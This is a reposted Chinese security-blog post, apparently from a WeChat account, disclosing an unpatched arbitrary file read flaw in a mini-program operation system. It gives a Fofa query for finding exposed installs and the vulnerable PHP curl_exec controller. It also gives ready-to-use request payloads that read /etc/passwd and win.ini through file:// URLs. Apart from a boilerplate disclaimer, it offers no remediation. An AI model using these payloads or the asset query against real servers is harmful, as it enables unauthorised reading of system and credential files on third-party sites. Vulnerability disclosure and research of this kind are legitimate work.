全行业小程序运营系统存在任意文件读取漏洞

admin 2024年7月15日12:17:50评论48 views字数 1430阅读4分46秒阅读模式
漏洞简介

    全行业小程序运营系统是一个无需编程,各行业模版直接套用,一键生成,公众号轻松搭建小程序,界面自由DIY,同步实时预览,可视化操作让您所见即所得,随心打造个性小程序。

资产详情

Fofa:"/com/css/head_foot.css"

全行业小程序运营系统存在任意文件读取漏洞全行业小程序运营系统存在任意文件读取漏洞

漏洞分析

在 /api/controller/Wxapps.php 控制器的_requestPost方法中,存在Curl_exec函数,且传参可控,导致任意文件读取漏洞产生.

//不带报头的curlpublic function _requestPost($url, $data, $ssl = true){  //curl完成  $curl = curl_init();  //设置curl选项  curl_setopt($curl, CURLOPT_URL, $url);//URL  $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 FirePHP/0.7.4';  curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);//user_agent,请求代理信息  curl_setopt($curl, CURLOPT_AUTOREFERER, true);//referer头,请求来源  curl_setopt($curl, CURLOPT_TIMEOUT, 30);//设置超时时间  //SSL相关  if ($ssl) {    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);//禁用后cURL将终止从服务端进行验证    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);//检查服务器SSL证书中是否存在一个公用名(common name)。  }  // 处理post相关选项  curl_setopt($curl, CURLOPT_POST, true);// 是否为POST请求  curl_setopt($curl, CURLOPT_POSTFIELDS, $data);// 处理请求数据  // 处理响应结果  curl_setopt($curl, CURLOPT_HEADER, false);//是否处理响应头  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);//curl_exec()是否返回响应结果  // 发出请求  $response = curl_exec($curl);  if (false === $response) {    echo '<br>', curl_error($curl), '<br>';    return false;  }  curl_close($curl);  return $response;}
漏洞复现

Payload:

/api/wxapps/_requestPost?url=file:///etc/passwd&data=1/api/wxapps/_requestPost?url=file:///C:/windows/win.ini&data=1

全行业小程序运营系统存在任意文件读取漏洞

标签:代码审计,0day,渗透测试,0day,公众号,源码,小程序,情侣

搭建问题,技术交流+下方VX:

 

原文始发于微信公众号(星悦安全):全行业小程序运营系统存在任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日12:17:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   全行业小程序运营系统存在任意文件读取漏洞https://cn-sec.com/archives/2956078.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息